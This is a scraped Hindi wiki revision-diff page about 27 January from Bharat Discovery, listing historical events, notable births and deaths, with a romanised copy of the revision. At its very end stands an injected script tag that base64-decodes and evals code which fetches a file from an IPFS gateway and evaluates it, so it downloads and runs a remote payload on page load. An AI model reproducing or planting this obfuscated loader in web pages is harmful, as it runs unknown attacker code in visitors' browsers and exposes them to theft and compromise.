Difference between revisions of "27 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
 
 
(34 intermediate revisions by 9 users not shown)
Line 1: Line 1:
 
{{कैलंडर}}
 
{{कैलंडर}}
  
[[ग्रेगोरी कैलंडर]] के अनुसार 27 जनवरी [[वर्ष]] का 27 वाँ दिन है। साल मे अभी और 338 दिन शेष हैं। (लीप वर्ष में 339 दिन)
+
[[ग्रेगोरी कैलंडर]] के अनुसार 27 जनवरी [[वर्ष]] का 27 वाँ दिन है। साल में अभी और 338 दिन शेष हैं। ([[लीप वर्ष]] में 339 दिन)
  
 
==27 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==27 जनवरी की महत्त्वपूर्ण घटनाएँ==
 +
* 1823 - [[अमेरिका]] के [[राष्ट्रपति]] जेम्स मोनरो ने दक्षिण अमेरिका के लिये पहला राजदूत नियुक्त किया।
 +
* [[1880]] - थॉमस अल्वा एडीसन ने बिजली से चलने वाले बल्ब का पेटेंट कराया।
 +
* [[1888]] - नेशनल ज्योग्राॅफिक सोसाइटी का वाशिंगटन में आयोजन किया गया।
 +
* [[1891]] - पेंसिल्वेनिया के माउंट प्लीसेंट में खदान विस्फोट में 109 लोग मारे गये।
 +
* [[1905]] - मौरिस राउविएर ने [[फ्रांस]] में सरकार बनायी।
 +
* [[1915]] - अमेरिकी मरीन ने हैती पर क़ब्ज़ा किया।
 +
* [[1943]] - अमेरिका ने जर्मनी पर पहली बार हवाई हमला किया।
 +
* [[1948]] - पहला टेप रिकॉर्डर बिका।
 +
* [[1959]] - नयी दिल्ली में पहले इंजीनियरिंग एंड टेक्नोलॉजी कॉलेज की आधार शिला रखी गयी।
 +
* [[1967]] - ‘अपोलो 1’ दुर्घटना में तीन अंतरिक्ष यात्रियों की मौत हो गई।
 +
* [[1969]] - इराक की [[राजधानी]] [[बगदाद]] में 14 लोगों को जासूसी के अपराध में फाँसी की सज़ा सुनायी गयी।
 +
* [[1974]] - [[राष्ट्रपति]] [[वी. वी. गिरि]] ने [[नयी दिल्ली]] के तीन मूर्ति स्थित नेहरु मेमारियल म्यूजियम को राष्ट्र को समर्पित किया।
 +
* [[1988]] - पहली बार हेलीकाॅप्टर डाक सेवा का उद्घाटन किया गया।
 +
* [[1996]] - [[पाकिस्तान]] को सं.रा. अमेरिका द्वारा 368 करोड़ डॉलर के हथियार आपूर्ति से संबंधित ब्राउन संशोधन को क़ानूनी रूप प्राप्त, [[फ़्रांस]] ने अपना छठा और सम्भवत: अंतिम परमाणु परीक्षण किया।
 +
* [[2008]] -
 +
**[[पश्चिम बंगाल]] के 13 ज़िलों में बर्ड फ्लू फैला।
 +
**इण्डोनेशिया के पूर्व राष्ट्रपति हाजी मुहम्मद सुहार्तो का निधन।
 +
* [[2013]] - [[अफ़ग़ानिस्तान]] के कंधार में बम हमलों में 20 पुलिस अधिकारी मारे गये।
 +
** [[मिस्र]] में विरोध प्रदर्शन के दौरान सात लोगों की मौत और 630 लोग घायल हुए।
  
 
==27 जनवरी को जन्मे व्यक्ति==
 
==27 जनवरी को जन्मे व्यक्ति==
 +
* [[1999]] - [[बिंदियारानी देवी]] - [[भारत]] की महिला भारोत्तोलक (वेटलिफ़्टर) हैं।
 +
* [[1978]] - [[कॉनराड संगमा]]- [[मेघालय]] राज्य से एक भारतीय राजनेता तथा मेघालय के 12वें मुख्यमंत्री।
 +
* [[1964]] - [[ज्ञानेश कुमार]] - [[भारत]] के नवनियुक्त चुनाव आयुक्त हैं।
 +
* [[1956]] - [[अमर सिंह (राजनेता)]] - भारतीय राजनीतिज्ञ थे, जिनका सम्बंध [[समाजवादी पार्टी]] से था।
 +
* [[1926]] - [[अरुण कुमार श्रीधर वैद्य]] - [[भारतीय सेना]] के 13वें थल सेनाध्यक्ष थे।
 +
* [[1922]] - [[अजीत]] - [[हिन्दी सिनेमा|भारतीय हिन्दी सिनेमा]] के प्रसिद्ध अभिनेता थे।
 +
* [[1907]] - [[पण्डित सीताराम चतुर्वेदी]] - प्रसिद्ध साहित्यकार और पत्रकार।
 +
* [[1901]] - [[लक्ष्मण शास्त्री जोशी]] - भारतीय मराठी लेखकों में से एक थे।
 +
* [[1889]] - [[मुनि जिनविजय]] - प्राचीन भारतीय साहित्य के अन्वेषी, संपादक और पाठालोचक थे।
 +
* [[1886]] - [[राधाबिनोद पाल]] - टोक्यो, [[जापान]] युद्ध अपराध न्यायाधिकरण में भारतीय न्यायाधीश थे।
 +
* [[1884]] - [[रघुनाथ कृष्ण फड़के]] - [[पद्म श्री]] से सम्मानित भारतीय मूर्तिकार थे।
  
 
==27 जनवरी को हुए निधन==
 
==27 जनवरी को हुए निधन==
 
+
* 1556- [[हुमायूँ]], मुग़ल बादशाह
 +
* [[2007]]- [[कमलेश्वर]] [[हिन्दी]] कथाकार, [[उपन्यासकार]], पत्रकार तथा पटकथा लेखक
 +
* [[2009]] - [[रामास्वामी वेंकटरमन|आर. वेंकटरमन]] ,[[भारत]] के 8वें राष्ट्रपति
 +
* [[2010]]- गुम्माडी [[वेंकटेश्वर राव]], तेलुगु चलचित्र अभिनेता
 +
* [[1992]]- [[भारत भूषण]], प्रसिद्ध हिन्दी फ़िल्म अभिनेता।
 +
* [[1986]] - [[निखिल बैनर्जी]] - 20वीं सदी में [[भारत]] के प्रमुख [[सितार]] वादकों में से एक थे।
 
==27 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==27 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-day-27-janury/today-in-history/news/761345.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 08:19, 16 March 2024


gregori kailandar ke anusar 27 janavari varsh ka 27 vaan din hai. sal mean abhi aur 338 din shesh haian. (lip varsh mean 339 din)

27 janavari ki mahattvapoorn ghatanaean

  • 1823 - amerika ke rashtrapati jems monaro ne dakshin amerika ke liye pahala rajadoot niyukt kiya.
  • 1880 - th aaumas alva edisan ne bijali se chalane vale balb ka peteant karaya.
  • 1888 - neshanal jyograॅphik sosaiti ka vashiangatan mean ayojan kiya gaya.
  • 1891 - peansilveniya ke mauant pliseant mean khadan visphot mean 109 log mare gaye.
  • 1905 - mauris rauvier ne phraans mean sarakar banayi.
  • 1915 - ameriki marin ne haiti par qabza kiya.
  • 1943 - amerika ne jarmani par pahali bar havaee hamala kiya.
  • 1948 - pahala tep rik aaurdar bika.
  • 1959 - nayi dilli mean pahale ianjiniyariang eand teknol aauji k aaulej ki adhar shila rakhi gayi.
  • 1967 - ‘apolo 1’ durghatana mean tin aantariksh yatriyoan ki maut ho gee.
  • 1969 - irak ki rajadhani bagadad mean 14 logoan ko jasoosi ke aparadh mean phaansi ki saza sunayi gayi.
  • 1974 - rashtrapati vi. vi. giri ne nayi dilli ke tin moorti sthit neharu memariyal myoojiyam ko rashtr ko samarpit kiya.
  • 1988 - pahali bar helikaॅptar dak seva ka udghatan kiya gaya.
  • 1996 - pakistan ko san.ra. amerika dvara 368 karo d d aaular ke hathiyar apoorti se sanbandhit braun sanshodhan ko qanooni roop prapt, fraans ne apana chhatha aur sambhavat: aantim paramanu parikshan kiya.
  • 2008 -
    • pashchim bangal ke 13 ziloan mean bard phloo phaila.
    • indoneshiya ke poorv rashtrapati haji muhammad suharto ka nidhan.
  • 2013 - afaganistan ke kandhar mean bam hamaloan mean 20 pulis adhikari mare gaye.
    • misr mean virodh pradarshan ke dauran sat logoan ki maut aur 630 log ghayal hue.

27 janavari ko janme vyakti

27 janavari ko hue nidhan

27 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>